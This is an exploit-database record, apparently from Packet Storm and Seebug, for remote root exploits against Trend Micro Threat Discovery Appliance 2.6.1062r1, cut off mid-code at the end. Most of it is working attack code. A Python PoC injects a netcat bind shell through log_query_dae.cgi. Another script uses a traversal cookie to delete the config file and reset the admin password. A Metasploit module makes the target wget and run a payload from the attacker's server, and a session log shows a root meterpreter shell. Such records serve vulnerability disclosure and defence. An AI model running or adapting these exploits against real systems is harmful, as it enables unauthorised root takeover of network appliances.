ID PACKETSTORM:142219 Type packetstorm Reporter Roberto Suggi Liverani Modified 2017-04-20T00:00:00
Description
`#!/usr/local/bin/python
"""
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dae.cgi Remote Code Execution Vulnerability
Found by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/
File: TDA_InstallationCD.2.6.1062r1.en_US.iso
sha1: 8da4604c92a944ba8f7744641bce932df008f9f9
Download: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1
Summary:
========
There exists a post authenticated command injection vulnerability that can be used to execute arbitrary code as root.
Notes:
======
- Since this is a busybox, getting a connectback seemed hard. So, for this particular PoC, all I did was
exec a bind shell using netcat.
- Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts...
- Auth is now bypassed, please see CVE-2016-7552
Example:
========
saturn:trend_micro_threat_discovery_log_query_dae_rce mr_me$ ./poc.py
(+) usage: ./poc.py <target> <pass>
(+) eg: ./poc.py 172.16.175.123 admin123
saturn:trend_micro_threat_discovery_log_query_dae_rce mr_me$ ./poc.py 172.16.175.123 admin
(+) logged in...
(+) starting backdoor, this will take a few secs...
(+) calling backdoor!
id
uid=0(root) gid=0(root)
uname -a
Linux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown
"""
import re
import os
import sys
import time
import requests
import threading
requests.packages.urllib3.disable_warnings()
if len(sys.argv) != 3:
print "(+) usage: %s <target> <pass>" % sys.argv[0]
print "(+) eg: %s 172.16.175.123 admin123" % sys.argv[0]
sys.exit(-1)
t = sys.argv[1]
p = sys.argv[2]
bu = "https://%s/" % t
l_url = "%scgi-bin/logon.cgi" % bu
e_url = "%scgi-bin/log_query_dae.cgi" % bu
s = requests.Session()
def exec_bd(s, e_url):
# now we setup our backdoor
# no reverse, since it seems to fail !?
netcat = "test|`nc -e /bin/sh -lp 1338`"
e_url += "?act=search_advanced&cache_id=%s" % netcat
s.get(e_url, verify=False)
# first we login...
r = s.post(l_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False)
if "frame.cgi" in r.text:
print "(+) logged in..."
thread = threading.Thread(target=exec_bd, args=(s, e_url,))
thread.start()
print "(+) starting backdoor, this will take a few secs..."
time.sleep(4)
print "(+) calling backdoor!"
os.system("nc %s 1337" % t)
else:
print "(-) login failed"
sys.exit(-1)
`
{"id": "PACKETSTORM:142219", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Trend Micro Threat Discovery Appliance 2.6.1062r1 log_query_dae.cgi Remote Code Execution", "description": "", "published": "2017-04-20T00:00:00", "modified": "2017-04-20T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "href": "https://packetstormsecurity.com/files/142219/Trend-Micro-Threat-Discovery-Appliance-2.6.1062r1-log_query_dae.cgi-Remote-Code-Execution.html", "reporter": "Roberto Suggi Liverani", "references": [], "cvelist": ["CVE-2016-7552", "CVE-2016-8589"], "lastseen": "2017-04-20T03:25:31", "viewCount": 25, "enchantments": {"score": {"value": 6.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2016-1038"]}, {"type": "cve", "idList": ["CVE-2016-7552", "CVE-2016-8589"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/TRENDMICRO_THREAT_DISCOVERY_ADMIN_SYS_TIME_CMDI", "MSF:EXPLOIT/MULTI/HTTP/TRENDMICRO_THREAT_DISCOVERY_ADMIN_SYS_TIME_CMDI/"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142201", "PACKETSTORM:142218", "PACKETSTORM:142225"]}, {"type": "seebug", "idList": ["SSV:92938", "SSV:92940", "SSV:92978", "SSV:92981", "SSV:92985", "SSV:92986"]}, {"type": "zdt", "idList": ["1337DAY-ID-27630", "1337DAY-ID-27635"]}], "rev": 4}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2016-1038"]}, {"type": "cve", "idList": ["CVE-2016-7552", "CVE-2016-8589"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/TRENDMICRO_THREAT_DISCOVERY_ADMIN_SYS_TIME_CMDI"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142201", "PACKETSTORM:142218", "PACKETSTORM:142225"]}, {"type": "seebug", "idList": ["SSV:92938", "SSV:92940", "SSV:92978", "SSV:92981", "SSV:92985", "SSV:92986"]}, {"type": "zdt", "idList": ["1337DAY-ID-27630"]}]}, "exploitation": null, "vulnersScore": 6.4}, "sourceHref": "https://packetstormsecurity.com/files/download/142219/tmtda261062rlllqd-exec.txt", "sourceData": "`#!/usr/local/bin/python \n\"\"\" \nTrend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dae.cgi Remote Code Execution Vulnerability \nFound by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/ \nFile: TDA_InstallationCD.2.6.1062r1.en_US.iso \nsha1: 8da4604c92a944ba8f7744641bce932df008f9f9 \nDownload: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1 \n \nSummary: \n======== \n \nThere exists a post authenticated command injection vulnerability that can be used to execute arbitrary code as root. \n \nNotes: \n====== \n \n- Since this is a busybox, getting a connectback seemed hard. So, for this particular PoC, all I did was \nexec a bind shell using netcat. \n \n- Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts... \n- Auth is now bypassed, please see CVE-2016-7552 \n \nExample: \n======== \n \nsaturn:trend_micro_threat_discovery_log_query_dae_rce mr_me$ ./poc.py \n(+) usage: ./poc.py <target> <pass> \n(+) eg: ./poc.py 172.16.175.123 admin123 \nsaturn:trend_micro_threat_discovery_log_query_dae_rce mr_me$ ./poc.py 172.16.175.123 admin \n(+) logged in... \n(+) starting backdoor, this will take a few secs... \n(+) calling backdoor! \nid \nuid=0(root) gid=0(root) \nuname -a \nLinux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown \n\"\"\" \n \nimport re \nimport os \nimport sys \nimport time \nimport requests \nimport threading \n \nrequests.packages.urllib3.disable_warnings() \n \nif len(sys.argv) != 3: \nprint \"(+) usage: %s <target> <pass>\" % sys.argv[0] \nprint \"(+) eg: %s 172.16.175.123 admin123\" % sys.argv[0] \nsys.exit(-1) \n \nt = sys.argv[1] \np = sys.argv[2] \n \nbu = \"https://%s/\" % t \nl_url = \"%scgi-bin/logon.cgi\" % bu \ne_url = \"%scgi-bin/log_query_dae.cgi\" % bu \n \ns = requests.Session() \n \ndef exec_bd(s, e_url): \n# now we setup our backdoor \n# no reverse, since it seems to fail !? \nnetcat = \"test|`nc -e /bin/sh -lp 1338`\" \ne_url += \"?act=search_advanced&cache_id=%s\" % netcat \ns.get(e_url, verify=False) \n \n# first we login... \nr = s.post(l_url, data={ \"passwd\":p, \"isCookieEnable\":1 }, verify=False) \nif \"frame.cgi\" in r.text: \nprint \"(+) logged in...\" \nthread = threading.Thread(target=exec_bd, args=(s, e_url,)) \nthread.start() \nprint \"(+) starting backdoor, this will take a few secs...\" \ntime.sleep(4) \nprint \"(+) calling backdoor!\" \nos.system(\"nc %s 1337\" % t) \nelse: \nprint \"(-) login failed\" \nsys.exit(-1) \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645377242}}
{"seebug": [{"lastseen": "2017-11-19T11:59:33", "description": "Summary:\r\n\r\n\r\nThere exists a post authenticated command injection vulnerability that can be used to execute arbitrary code as root.\r\n\r\nNotes:\r\n\r\n\r\n- Since this is a busybox, getting a connectback seemed hard. So, for this particular PoC, all I did was \r\nexec a bind shell using netcat.\r\n- Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts...\r\n- Auth is now bypassed, please see CVE-2016-7552\r\n\r\nExample:\r\n\r\n```\r\nsaturn:trend_micro_threat_discovery_log_query_dae_rce mr_me$ ./poc.py \r\n(+) usage: ./poc.py <target> <pass>\r\n(+) eg: ./poc.py 172.16.175.123 admin123\r\nsaturn:trend_micro_threat_discovery_log_query_dae_rce mr_me$ ./poc.py 172.16.175.123 admin\r\n(+) logged in...\r\n(+) starting backdoor, this will take a few secs...\r\n(+) calling backdoor!\r\nid\r\nuid=0(root) gid=0(root)\r\nuname -a\r\nLinux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown\r\n```", "published": "2017-04-21T00:00:00", "type": "seebug", "title": "Trend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dae.cgi Command Injection Remote Code Execution Vulnerability (CVE-2016-8589)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7552", "CVE-2016-8589"], "modified": "2017-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92985", "id": "SSV:92985", "sourceData": "\n import re\r\nimport os\r\nimport sys\r\nimport time\r\nimport requests\r\nimport threading\r\n\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\nif len(sys.argv) != 3:\r\n print \"(+) usage: %s <target> <pass>\" % sys.argv[0]\r\n print \"(+) eg: %s 172.16.175.123 admin123\" % sys.argv[0]\r\n sys.exit(-1)\r\n\r\nt = sys.argv[1]\r\np = sys.argv[2]\r\n\r\nbu = \"https://%s/\" % t\r\nl_url = \"%scgi-bin/logon.cgi\" % bu\r\ne_url = \"%scgi-bin/log_query_dae.cgi\" % bu\r\n\r\ns = requests.Session()\r\n\r\ndef exec_bd(s, e_url):\r\n # now we setup our backdoor\r\n # no reverse, since it seems to fail !?\r\n netcat = \"test|`nc -e /bin/sh -lp 1338`\"\r\n e_url += \"?act=search_advanced&cache_id=%s\" % netcat\r\n s.get(e_url, verify=False)\r\n\r\n# first we login...\r\nr = s.post(l_url, data={ \"passwd\":p, \"isCookieEnable\":1 }, verify=False)\r\nif \"frame.cgi\" in r.text:\r\n print \"(+) logged in...\"\r\n thread = threading.Thread(target=exec_bd, args=(s, e_url,))\r\n thread.start()\r\n print \"(+) starting backdoor, this will take a few secs...\"\r\n time.sleep(4)\r\n print \"(+) calling backdoor!\"\r\n os.system(\"nc %s 1337\" % t)\r\nelse:\r\n print \"(-) login failed\"\r\n sys.exit(-1)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92985", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T11:59:35", "description": "#### Summary:\r\n\r\nThere exists a pre-authenticated directory traversal vulnerability that allows an attacker to delete any folder or file as root. \r\nThis can result in an attacker causing a DoS or bypassing authentication.\r\n\r\n#### Exploitation:\r\n\r\nAn attacker can use this vulnerability to bypass the authentication by reseting the default password back to 'admin'.\r\n1. Delete the config file /opt/TrendMicro/MinorityReport/etc/igsa.conf\r\n2. Wait for the server to be rebooted...\r\nIt is highly likely the server will be rebooted because the deletion of the config file causes a DoS condition whereby\r\nno-body can even login... (since the md5 hashed pw is stored in the config file).\r\nNotes:\r\n======\r\n- (Un)fortunately, we were not able to find a pre-authenticated way to reboot the server, hence requiring slight user interaction (or patience)\r\n- No username required!\r\n\r\n#### Example:\r\n\r\n```\r\nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py \r\n(+) usage: ./poc.py <target> <option [reset][login]>\r\n(+) eg: ./poc.py 172.16.175.123 reset\r\n(+) eg: ./poc.py 172.16.175.123 login\r\nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login\r\n(-) login failed\r\nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 reset\r\n(+) resetting the default password...\r\n(+) success! now wait for a reboot...\r\nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login\r\n(+) logged in...\r\n(+) authenticated session_id: de685c4feec6d698f8165a8af8489df1\r\n```", "published": "2017-04-21T00:00:00", "type": "seebug", "title": "Trend Micro Threat Discovery Appliance <= 2.6.1062r1 logoff.cgi Directory Traversal Authentication Bypass Vulnerability\uff08CVE-2016-7552\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7552"], "modified": "2017-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92981", "id": "SSV:92981", "sourceData": "\n import re\r\nimport os\r\nimport sys\r\nimport time\r\nimport requests\r\nimport threading\r\n\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\nif len(sys.argv) != 3:\r\n print \"(+) usage: %s <target> <option [reset][login]>\" % sys.argv[0]\r\n print \"(+) eg: %s 172.16.175.123 reset\" % sys.argv[0]\r\n print \"(+) eg: %s 172.16.175.123 login\" % sys.argv[0]\r\n sys.exit(-1)\r\n\r\nt = sys.argv[1]\r\no = sys.argv[2]\r\n\r\nbu = \"https://%s/\" % t\r\nl_url = \"%scgi-bin/logon.cgi\" % bu\r\no_url = \"%scgi-bin/logoff.cgi\" % bu\r\n\r\nif o.lower() == \"login\":\r\n # default password\r\n r = requests.post(l_url, data={ \"passwd\":\"admin\", \"isCookieEnable\":1 }, verify=False)\r\n if \"frame.cgi\" in r.text:\r\n print \"(+) logged in...\"\r\n match = re.search(\"session_id=(.*); path\", r.headers['set-cookie'])\r\n if match:\r\n print \"(+) authenticated session_id: %s\" % match.group(1)\r\n else:\r\n print \"(-) login failed\"\r\nelif o.lower() == \"reset\":\r\n print \"(+) resetting the default password...\"\r\n r = requests.get(o_url, cookies={\"session_id\":\"../../../opt/TrendMicro/MinorityReport/etc/igsa.conf\"}, verify=False)\r\n # causes an uninitialized free() vulnerability as well...\r\n if \"Memory map\" in r.text:\r\n print \"(+) success! now wait for a reboot...\"\r\nelse:\r\n print \"(-) not a valid option!\"\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92981", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T11:59:56", "description": "A file delete in the logoff.cgi interface that allows for an authentication bypass (CVE-2016-7552).\r\nA command injection in the admin_sys_time.cgi interface that allows for an attacker to gain remote code execution (CVE-2016-7547).\r\n\r\nTrend Micro are not patching this vulnerability since this product is now ([EOL](https://success.trendmicro.com/solution/1105727-list-of-end-of-life-eol-end-of-support-eos-trend-micro-products)).\r\n\r\n#### Installation\r\n\r\nList the steps needed to make sure this thing works\r\n\r\n* Download the ISO from (Trend Micro's) download site.\r\n* Setup the VM to have 2 NIC's, 100 Gig HD and 4096 RAM.\r\n* Click through the default install.\r\n* You are ready to burn.\r\n\r\n#### Verification\r\n\r\nList the steps needed to make sure this thing works\r\n\r\n* Start msfconsole\r\n* use exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi\r\n* set payload linux/x86/meterpreter/reverse_tcp\r\n* set RHOST XXX.XXX.XXX.XXX\r\n* set LHOST XXX.XXX.XXX.XXX\r\n* check\r\n* Verify that the target is vulnerable.\r\n* exploit\r\n* The exploit will reset the admin password, now reboot the VM.\r\n* Verify that you have rebooted the VM and that you receive a shell.", "cvss3": {}, "published": "2017-04-12T00:00:00", "type": "seebug", "title": "Trend Micro Threat Discovery Appliance arbitrary files deletion (CVE-2016-7552)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-7547", "CVE-2016-7552"], "modified": "2017-04-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92938", "id": "SSV:92938", "sourceData": "\n ##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution',\r\n 'Description' => %q{\r\n This module exploits two vulnerabilities the Trend Micro Threat Discovery Appliance.\r\n The first is an authentication bypass vulnerability via a file delete in logoff.cgi\r\n which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552). \r\n The second is a cmdi flaw using the timezone parameter in the admin_sys_time.cgi \r\n interface (CVE-2016-7547). You have the option to use the authentication bypass or \r\n not since it requires that the server is rebooted. This module has been tested on \r\n version 2.6.1062r1 of the appliance.\r\n },\r\n 'Author' =>\r\n [\r\n 'mr_me <steventhomasseeley@gmail.com>', # vuln + msf\r\n 'Roberto Suggi Liverani @malerisch', # vuln + msf\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://asciinema.org/a/112480'], # demo\r\n [ 'CVE', '2016-7552'], # auth bypass\r\n [ 'CVE', '2016-7547'], # cmdi\r\n ],\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Trend Micro Threat Discovery Appliance 2.6.1062r1', {} ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true\r\n },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Apr 10 2017'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptString.new('TARGETURI', [true, 'The target URI', '/']),\r\n OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']),\r\n OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),\r\n OptBool.new('AUTHBYPASS', [ true, 'Bypass the authentication', true ]),\r\n\r\n ], self.class)\r\n end\r\n\r\n def check\r\n if do_login\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/about.cgi'),\r\n 'cookie' => @cookie,\r\n 'method' => 'GET',\r\n }, 1)\r\n if res and res.code == 200 and res.body =~ /About Trend Micro/\r\n version = \"#{$1}\" if res.body =~ /var ver_str = new String\\(\"(.*)\"\\)/\r\n case version\r\n when /2.6.1062/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n end\r\n end\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n if datastore['AUTHBYPASS']\r\n print_status(\"Bypassing authentication...\")\r\n if reset_password\r\n print_good(\"The password has been reset!\")\r\n print_status(\"Waiting for the reboot...\")\r\n pwn_after_reboot\r\n end\r\n else\r\n if do_login\r\n pwn\r\n else\r\n fail_with(Failure::NoAccess, \"Authentication failed\")\r\n end\r\n end\r\n end\r\n\r\n def reset_password\r\n c = \"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf\"\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logoff.cgi'),\r\n 'method' => 'GET',\r\n 'cookie' => c,\r\n })\r\n\r\n if res and res.code == 200 and res.headers.to_s =~ /Backtrace/\r\n return true\r\n end\r\n return false\r\n end\r\n\r\n def pwn\r\n start_http_server\r\n print_good(\"Logged in\")\r\n download_exec\r\n end\r\n\r\n def pwn_after_reboot\r\n @rebooted = false\r\n while !@rebooted\r\n if do_login\r\n @rebooted = true\r\n pwn\r\n end\r\n end\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n if (not @pl)\r\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\r\n return\r\n end\r\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\r\n @elf_sent = true\r\n send_response(cli, @pl)\r\n end\r\n\r\n def start_http_server\r\n @pl = generate_payload_exe\r\n @elf_sent = false\r\n\r\n downfile = rand_text_alpha(8+rand(8))\r\n resource_uri = '/' + downfile\r\n\r\n # do not use SSL for the attacking web server\r\n if datastore['SSL']\r\n ssl_restore = true\r\n datastore['SSL'] = false\r\n end\r\n\r\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\r\n srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)\r\n else\r\n srv_host = datastore['SRVHOST']\r\n end\r\n\r\n @service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri\r\n service_url_payload = srv_host + resource_uri\r\n\r\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...\")\r\n start_service({'Uri' => {\r\n 'Proc' => Proc.new { |cli, req|\r\n on_request_uri(cli, req)\r\n },\r\n 'Path' => resource_uri\r\n }})\r\n\r\n datastore['SSL'] = true if ssl_restore\r\n connect\r\n end\r\n\r\n def exec(cmd)\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/admin_sys_time.cgi'),\r\n 'cookie' => @cookie,\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'act' => 'save',\r\n 'timezone' => cmd,\r\n }\r\n }, 1)\r\n end\r\n\r\n def download_exec\r\n @bd = rand_text_alpha(8+rand(8))\r\n register_file_for_cleanup(\"/tmp/#{@bd}\")\r\n exec(\"|`wget #{@service_url} -O /tmp/#{@bd}`\")\r\n exec(\"|`chmod 755 /tmp/#{@bd}`\")\r\n exec(\"|`/tmp/#{@bd}`\")\r\n\r\n # we need to delay, for the stager\r\n select(nil, nil, nil, 5)\r\n end\r\n\r\n def do_login\r\n\r\n begin\r\n login = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logon.cgi'),\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'passwd' => datastore['PASSWORD'],\r\n 'isCookieEnable' => 1,\r\n }\r\n })\r\n\r\n # these are needed due to the reboot\r\n rescue Rex::ConnectionRefused\r\n return false\r\n rescue Rex::ConnectionTimeout\r\n return false\r\n end\r\n if login and login.code == 200 and login.body =~ /frame\\.cgi/\r\n @cookie = \"session_id=#{$1};\" if login.get_cookies =~ /session_id=(.*);/\r\n return true\r\n end\r\n return false\r\n end\r\nend\r\n=begin\r\nsaturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/trend.rc \r\n[*] Processing scripts/trend.rc for ERB directives.\r\nresource (scripts/trend.rc)> use exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi\r\nresource (scripts/trend.rc)> set RHOST 192.168.100.2\r\nRHOST => 192.168.100.2\r\nresource (scripts/trend.rc)> set payload linux/x86/meterpreter/reverse_tcp\r\npayload => linux/x86/meterpreter/reverse_tcp\r\nresource (scripts/trend.rc)> set LHOST 192.168.100.13\r\nLHOST => 192.168.100.13\r\nresource (scripts/trend.rc)> exploit\r\n[*] Exploit running as background job.\r\n[*] Started reverse TCP handler on 192.168.100.13:4444 \r\n[*] Bypassing authentication...\r\nmsf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > \r\n[+] The password has been reset!\r\n[*] Waiting for the reboot...\r\n[*] 192.168.100.2:443 - Starting up our web service on http://192.168.100.13:1337/nnDBuOUMuKnxP ...\r\n[*] Using URL: http://0.0.0.0:1337/nnDBuOUMuKnxP\r\n[*] Local IP: http://192.168.100.13:1337/nnDBuOUMuKnxP\r\n[+] Logged in\r\n[*] 192.168.100.2:443 - Sending the payload to the server...\r\n[*] Transmitting intermediate stager for over-sized stage...(105 bytes)\r\n[*] Sending stage (1495599 bytes) to 192.168.100.2\r\n[*] Meterpreter session 1 opened (192.168.100.13:4444 -> 192.168.100.2:46140) at 2016-09-23 14:59:08 -0500\r\n[+] Deleted /tmp/rpNDXQZTB\r\n[*] Server stopped.\r\nmsf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > sessions -i 1\r\n[*] Starting interaction with 1...\r\nmeterpreter > shell\r\nProcess 3846 created.\r\nChannel 1 created.\r\nBusyBox v1.00 (2010.10.13-06:52+0000) Built-in shell (ash)\r\nEnter 'help' for a list of built-in commands.\r\n/bin/sh: can't access tty; job control turned off\r\n/opt/TrendMicro/MinorityReport/www/cgi-bin # id\r\nid\r\nuid=0(root) gid=0(root)\r\n/opt/TrendMicro/MinorityReport/www/cgi-bin #\r\n=end\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92938", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T12:00:06", "description": "A command injection in the admin_sys_time. the cgi interface that allows for an attacker to gain remote code execution (CVE-2016-7547).\n\nVulnerability linkage: https://www.seebug.org/vuldb/ssvid-92938\n", "published": "2017-04-12T00:00:00", "type": "seebug", "title": "Trend Micro Threat Discovery Appliance remote code execution\uff08CVE-2016-7547\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7547", "CVE-2016-7552"], "modified": "2017-04-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92940", "id": "SSV:92940", "sourceData": "\n ##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution',\r\n 'Description' => %q{\r\n This module exploits two vulnerabilities the Trend Micro Threat Discovery Appliance.\r\n The first is an authentication bypass vulnerability via a file delete in logoff.cgi\r\n which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552). \r\n The second is a cmdi flaw using the timezone parameter in the admin_sys_time.cgi \r\n interface (CVE-2016-7547). You have the option to use the authentication bypass or \r\n not since it requires that the server is rebooted. This module has been tested on \r\n version 2.6.1062r1 of the appliance.\r\n },\r\n 'Author' =>\r\n [\r\n 'mr_me <steventhomasseeley@gmail.com>', # vuln + msf\r\n 'Roberto Suggi Liverani @malerisch', # vuln + msf\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://asciinema.org/a/112480'], # demo\r\n [ 'CVE', '2016-7552'], # auth bypass\r\n [ 'CVE', '2016-7547'], # cmdi\r\n ],\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Trend Micro Threat Discovery Appliance 2.6.1062r1', {} ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true\r\n },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Apr 10 2017'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptString.new('TARGETURI', [true, 'The target URI', '/']),\r\n OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']),\r\n OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),\r\n OptBool.new('AUTHBYPASS', [ true, 'Bypass the authentication', true ]),\r\n\r\n ], self.class)\r\n end\r\n\r\n def check\r\n if do_login\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/about.cgi'),\r\n 'cookie' => @cookie,\r\n 'method' => 'GET',\r\n }, 1)\r\n if res and res.code == 200 and res.body =~ /About Trend Micro/\r\n version = \"#{$1}\" if res.body =~ /var ver_str = new String\\(\"(.*)\"\\)/\r\n case version\r\n when /2.6.1062/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n end\r\n end\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n if datastore['AUTHBYPASS']\r\n print_status(\"Bypassing authentication...\")\r\n if reset_password\r\n print_good(\"The password has been reset!\")\r\n print_status(\"Waiting for the reboot...\")\r\n pwn_after_reboot\r\n end\r\n else\r\n if do_login\r\n pwn\r\n else\r\n fail_with(Failure::NoAccess, \"Authentication failed\")\r\n end\r\n end\r\n end\r\n\r\n def reset_password\r\n c = \"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf\"\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logoff.cgi'),\r\n 'method' => 'GET',\r\n 'cookie' => c,\r\n })\r\n\r\n if res and res.code == 200 and res.headers.to_s =~ /Backtrace/\r\n return true\r\n end\r\n return false\r\n end\r\n\r\n def pwn\r\n start_http_server\r\n print_good(\"Logged in\")\r\n download_exec\r\n end\r\n\r\n def pwn_after_reboot\r\n @rebooted = false\r\n while !@rebooted\r\n if do_login\r\n @rebooted = true\r\n pwn\r\n end\r\n end\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n if (not @pl)\r\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\r\n return\r\n end\r\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\r\n @elf_sent = true\r\n send_response(cli, @pl)\r\n end\r\n\r\n def start_http_server\r\n @pl = generate_payload_exe\r\n @elf_sent = false\r\n\r\n downfile = rand_text_alpha(8+rand(8))\r\n resource_uri = '/' + downfile\r\n\r\n # do not use SSL for the attacking web server\r\n if datastore['SSL']\r\n ssl_restore = true\r\n datastore['SSL'] = false\r\n end\r\n\r\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\r\n srv_host = datastore['URIHOST'] || 